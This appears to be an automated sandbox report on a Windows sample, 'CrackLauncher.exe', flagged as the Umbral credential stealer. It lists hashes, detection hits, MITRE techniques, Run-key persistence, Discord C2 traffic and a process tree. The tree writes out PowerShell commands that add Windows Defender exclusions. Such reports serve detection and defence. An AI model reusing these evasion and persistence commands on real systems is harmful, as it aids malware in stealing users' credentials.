umbral | 845412b126125d6581e02480cb372ab7e867c9c36dab2d67e09b7a3cbe4d2194

Analysis

max time kernel
47s
max time network
68s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2025 03:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CrackLauncher.exe
Size

376KB
MD5

2a62ae30d23236f10284cec83783dda1
SHA1

04c528b61e01e6444ca30bc346dd6f38d4e8c8a6
SHA256

fdbda1e73337813b63b388173d5311bcb9198d73ad4a0f15661af5fb5680f219
SHA512

321868f629f5fba5f2144192598327081744ca22938d371fe480a6fcd54ffb9665c056452c5d7092a330c770f49167d4830435a2f7a8c3a9c2d2a78dd95c39ea
SSDEEP

6144:CR9tZo8WQzx19RgGppFWFC71UbyenXtL/Z0EyzPsO5FR0guVi389xaYVQ:CR7ZnVfMGTFgCZWRnXJOEyTD5T0guVu7

Score

10^/10

umbral discovery execution persistence spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000600000001e762-37.dat	family_umbral
behavioral1/memory/5080-45-0x00000235E5400000-0x00000235E5440000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2868	powershell.exe
1872	powershell.exe
3956	powershell.exe
4704	powershell.exe
4412	powershell.exe
2324	powershell.exe
3020	powershell.exe
3320	powershell.exe
4768	powershell.exe
2276	powershell.exe
4168	powershell.exe
400	powershell.exe
4756	powershell.exe
4552	powershell.exe
4440	powershell.exe
1036	powershell.exe
1984	powershell.exe
3380	powershell.exe
988	powershell.exe
4288	powershell.exe
3284	powershell.exe
5000	powershell.exe
640	powershell.exe
116	powershell.exe
3184	powershell.exe
1076	powershell.exe
1804	powershell.exe
3536	powershell.exe
4568	powershell.exe
2388	powershell.exe
396	powershell.exe
736	powershell.exe
1824	powershell.exe
4796	powershell.exe
4572	powershell.exe
668	powershell.exe
3664	powershell.exe
220	powershell.exe
3960	powershell.exe
3528	powershell.exe
2404	powershell.exe
116	powershell.exe
740	powershell.exe
5088	powershell.exe
1984	powershell.exe
1900	powershell.exe
1848	powershell.exe
1672	powershell.exe
4608	powershell.exe
2172	powershell.exe
1848	powershell.exe
3152	powershell.exe
1848	powershell.exe
4984	powershell.exe
3024	powershell.exe
3212	powershell.exe
4736	powershell.exe
1804	powershell.exe
2884	powershell.exe
4888	powershell.exe
4172	powershell.exe
1924	powershell.exe
3904	powershell.exe
3100	powershell.exe

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe

Executes dropped EXE 17 IoCs

pid	Process
5080	Umbral.exe
4156	Umbral.exe
4768	Umbral.exe
5112	Umbral.exe
4432	Umbral.exe
2036	Umbral.exe
1804	Umbral.exe
1512	Umbral.exe
1640	Umbral.exe
3928	Umbral.exe
3500	Umbral.exe
4956	Umbral.exe
1428	Umbral.exe
436	Umbral.exe
3724	Umbral.exe
2588	Umbral.exe
1008	Umbral.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 34 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Umbral = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Umbral.exe"	CrackLauncher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
31	discord.com
36	discord.com
52	discord.com
56	discord.com
65	discord.com
69	discord.com
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 14 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1560	PING.EXE
4324	PING.EXE
2008	cmd.exe
4032	cmd.exe
224	cmd.exe
3672	PING.EXE
4296	PING.EXE
2644	cmd.exe
4476	cmd.exe
1508	cmd.exe
4404	PING.EXE
1728	PING.EXE
3200	PING.EXE
4292	cmd.exe

Detects videocard installed 1 TTPs 8 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4492	wmic.exe
4932	wmic.exe
4512	wmic.exe
3556	wmic.exe
4816	wmic.exe
1876	wmic.exe
1564	wmic.exe
4996	wmic.exe

Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery

T1018

pid	Process
1728	PING.EXE
3200	PING.EXE
3672	PING.EXE
4296	PING.EXE
1560	PING.EXE
4404	PING.EXE
4324	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3152	powershell.exe
3152	powershell.exe
3956	powershell.exe
3956	powershell.exe
4572	powershell.exe
4572	powershell.exe
2388	powershell.exe
2388	powershell.exe
5080	Umbral.exe
3184	powershell.exe
3184	powershell.exe
1200	powershell.exe
1200	powershell.exe
3876	powershell.exe
3876	powershell.exe
1076	powershell.exe
1076	powershell.exe
2220	powershell.exe
2220	powershell.exe
2276	powershell.exe
2276	powershell.exe
4296	powershell.exe
4296	powershell.exe
3020	powershell.exe
3020	powershell.exe
2404	powershell.exe
2404	powershell.exe
668	powershell.exe
668	powershell.exe
1848	powershell.exe
1848	powershell.exe
4432	Umbral.exe
220	powershell.exe
220	powershell.exe
3212	powershell.exe
3212	powershell.exe
2884	powershell.exe
2884	powershell.exe
5000	powershell.exe
852	powershell.exe
5000	powershell.exe
852	powershell.exe
844	powershell.exe
844	powershell.exe
4168	powershell.exe
4168	powershell.exe
4740	powershell.exe
4740	powershell.exe
640	powershell.exe
640	powershell.exe
4736	powershell.exe
4736	powershell.exe
1900	powershell.exe
1900	powershell.exe
1512	Umbral.exe
4704	powershell.exe
4704	powershell.exe
5088	powershell.exe
5088	powershell.exe
4888	powershell.exe
4888	powershell.exe
3320	powershell.exe
3320	powershell.exe
4028	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	3956	powershell.exe
Token: SeDebugPrivilege	5080	Umbral.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	wmic.exe
Token: SeSecurityPrivilege	3132	wmic.exe
Token: SeTakeOwnershipPrivilege	3132	wmic.exe
Token: SeLoadDriverPrivilege	3132	wmic.exe
Token: SeSystemProfilePrivilege	3132	wmic.exe
Token: SeSystemtimePrivilege	3132	wmic.exe
Token: SeProfSingleProcessPrivilege	3132	wmic.exe
Token: SeIncBasePriorityPrivilege	3132	wmic.exe
Token: SeCreatePagefilePrivilege	3132	wmic.exe
Token: SeBackupPrivilege	3132	wmic.exe
Token: SeRestorePrivilege	3132	wmic.exe
Token: SeShutdownPrivilege	3132	wmic.exe
Token: SeDebugPrivilege	3132	wmic.exe
Token: SeSystemEnvironmentPrivilege	3132	wmic.exe
Token: SeRemoteShutdownPrivilege	3132	wmic.exe
Token: SeUndockPrivilege	3132	wmic.exe
Token: SeManageVolumePrivilege	3132	wmic.exe
Token: 33	3132	wmic.exe
Token: 34	3132	wmic.exe
Token: 35	3132	wmic.exe
Token: 36	3132	wmic.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	wmic.exe
Token: SeSecurityPrivilege	3132	wmic.exe
Token: SeTakeOwnershipPrivilege	3132	wmic.exe
Token: SeLoadDriverPrivilege	3132	wmic.exe
Token: SeSystemProfilePrivilege	3132	wmic.exe
Token: SeSystemtimePrivilege	3132	wmic.exe
Token: SeProfSingleProcessPrivilege	3132	wmic.exe
Token: SeIncBasePriorityPrivilege	3132	wmic.exe
Token: SeCreatePagefilePrivilege	3132	wmic.exe
Token: SeBackupPrivilege	3132	wmic.exe
Token: SeRestorePrivilege	3132	wmic.exe
Token: SeShutdownPrivilege	3132	wmic.exe
Token: SeDebugPrivilege	3132	wmic.exe
Token: SeSystemEnvironmentPrivilege	3132	wmic.exe
Token: SeRemoteShutdownPrivilege	3132	wmic.exe
Token: SeUndockPrivilege	3132	wmic.exe
Token: SeManageVolumePrivilege	3132	wmic.exe
Token: 33	3132	wmic.exe
Token: 34	3132	wmic.exe
Token: 35	3132	wmic.exe
Token: 36	3132	wmic.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeIncreaseQuotaPrivilege	3404	wmic.exe
Token: SeSecurityPrivilege	3404	wmic.exe
Token: SeTakeOwnershipPrivilege	3404	wmic.exe
Token: SeLoadDriverPrivilege	3404	wmic.exe
Token: SeSystemProfilePrivilege	3404	wmic.exe
Token: SeSystemtimePrivilege	3404	wmic.exe
Token: SeProfSingleProcessPrivilege	3404	wmic.exe
Token: SeIncBasePriorityPrivilege	3404	wmic.exe
Token: SeCreatePagefilePrivilege	3404	wmic.exe
Token: SeBackupPrivilege	3404	wmic.exe
Token: SeRestorePrivilege	3404	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4752 wrote to memory of 3152	4752	CrackLauncher.exe	83
PID 4752 wrote to memory of 3152	4752	CrackLauncher.exe	83
PID 4752 wrote to memory of 3772	4752	CrackLauncher.exe	85
PID 4752 wrote to memory of 3772	4752	CrackLauncher.exe	85
PID 4752 wrote to memory of 3956	4752	CrackLauncher.exe	86
PID 4752 wrote to memory of 3956	4752	CrackLauncher.exe	86
PID 4752 wrote to memory of 5080	4752	CrackLauncher.exe	88
PID 4752 wrote to memory of 5080	4752	CrackLauncher.exe	88
PID 3772 wrote to memory of 4572	3772	CrackLauncher.exe	89
PID 3772 wrote to memory of 4572	3772	CrackLauncher.exe	89
PID 5080 wrote to memory of 3132	5080	Umbral.exe	92
PID 5080 wrote to memory of 3132	5080	Umbral.exe	92
PID 3772 wrote to memory of 3408	3772	CrackLauncher.exe	94
PID 3772 wrote to memory of 3408	3772	CrackLauncher.exe	94
PID 3772 wrote to memory of 2388	3772	CrackLauncher.exe	95
PID 3772 wrote to memory of 2388	3772	CrackLauncher.exe	95
PID 3772 wrote to memory of 4156	3772	CrackLauncher.exe	99
PID 3772 wrote to memory of 4156	3772	CrackLauncher.exe	99
PID 5080 wrote to memory of 1580	5080	Umbral.exe	100
PID 5080 wrote to memory of 1580	5080	Umbral.exe	100
PID 5080 wrote to memory of 3184	5080	Umbral.exe	102
PID 5080 wrote to memory of 3184	5080	Umbral.exe	102
PID 5080 wrote to memory of 1200	5080	Umbral.exe	104
PID 5080 wrote to memory of 1200	5080	Umbral.exe	104
PID 5080 wrote to memory of 3876	5080	Umbral.exe	106
PID 5080 wrote to memory of 3876	5080	Umbral.exe	106
PID 3408 wrote to memory of 1076	3408	CrackLauncher.exe	108
PID 3408 wrote to memory of 1076	3408	CrackLauncher.exe	108
PID 5080 wrote to memory of 2220	5080	Umbral.exe	110
PID 5080 wrote to memory of 2220	5080	Umbral.exe	110
PID 3408 wrote to memory of 2008	3408	CrackLauncher.exe	112
PID 3408 wrote to memory of 2008	3408	CrackLauncher.exe	112
PID 3408 wrote to memory of 2276	3408	CrackLauncher.exe	113
PID 3408 wrote to memory of 2276	3408	CrackLauncher.exe	113
PID 3408 wrote to memory of 4768	3408	CrackLauncher.exe	115
PID 3408 wrote to memory of 4768	3408	CrackLauncher.exe	115
PID 5080 wrote to memory of 3404	5080	Umbral.exe	116
PID 5080 wrote to memory of 3404	5080	Umbral.exe	116
PID 5080 wrote to memory of 2480	5080	Umbral.exe	118
PID 5080 wrote to memory of 2480	5080	Umbral.exe	118
PID 5080 wrote to memory of 1364	5080	Umbral.exe	120
PID 5080 wrote to memory of 1364	5080	Umbral.exe	120
PID 5080 wrote to memory of 4296	5080	Umbral.exe	122
PID 5080 wrote to memory of 4296	5080	Umbral.exe	122
PID 5080 wrote to memory of 4996	5080	Umbral.exe	126
PID 5080 wrote to memory of 4996	5080	Umbral.exe	126
PID 2008 wrote to memory of 3020	2008	CrackLauncher.exe	128
PID 2008 wrote to memory of 3020	2008	CrackLauncher.exe	128
PID 2008 wrote to memory of 1944	2008	CrackLauncher.exe	132
PID 2008 wrote to memory of 1944	2008	CrackLauncher.exe	132
PID 2008 wrote to memory of 2404	2008	CrackLauncher.exe	133
PID 2008 wrote to memory of 2404	2008	CrackLauncher.exe	133
PID 2008 wrote to memory of 5112	2008	CrackLauncher.exe	135
PID 2008 wrote to memory of 5112	2008	CrackLauncher.exe	135
PID 5080 wrote to memory of 4476	5080	Umbral.exe	137
PID 5080 wrote to memory of 4476	5080	Umbral.exe	137
PID 4476 wrote to memory of 4404	4476	cmd.exe	173
PID 4476 wrote to memory of 4404	4476	cmd.exe	173
PID 1944 wrote to memory of 668	1944	CrackLauncher.exe	169
PID 1944 wrote to memory of 668	1944	CrackLauncher.exe	169
PID 1944 wrote to memory of 3108	1944	CrackLauncher.exe	143
PID 1944 wrote to memory of 3108	1944	CrackLauncher.exe	143
PID 1944 wrote to memory of 1848	1944	CrackLauncher.exe	144
PID 1944 wrote to memory of 1848	1944	CrackLauncher.exe	144

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2012	attrib.exe
4884	attrib.exe
2908	attrib.exe
904	attrib.exe
4704	attrib.exe
1036	attrib.exe
4072	attrib.exe
1580	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3152
- C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4572
- - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
    3⤵
    - Checks computer location settings
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
      4⤵
      Checks computer location settings
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3020
    - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        5⤵
        Checks computer location settings
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:1944
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:668
      - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        6⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        7⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        8⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
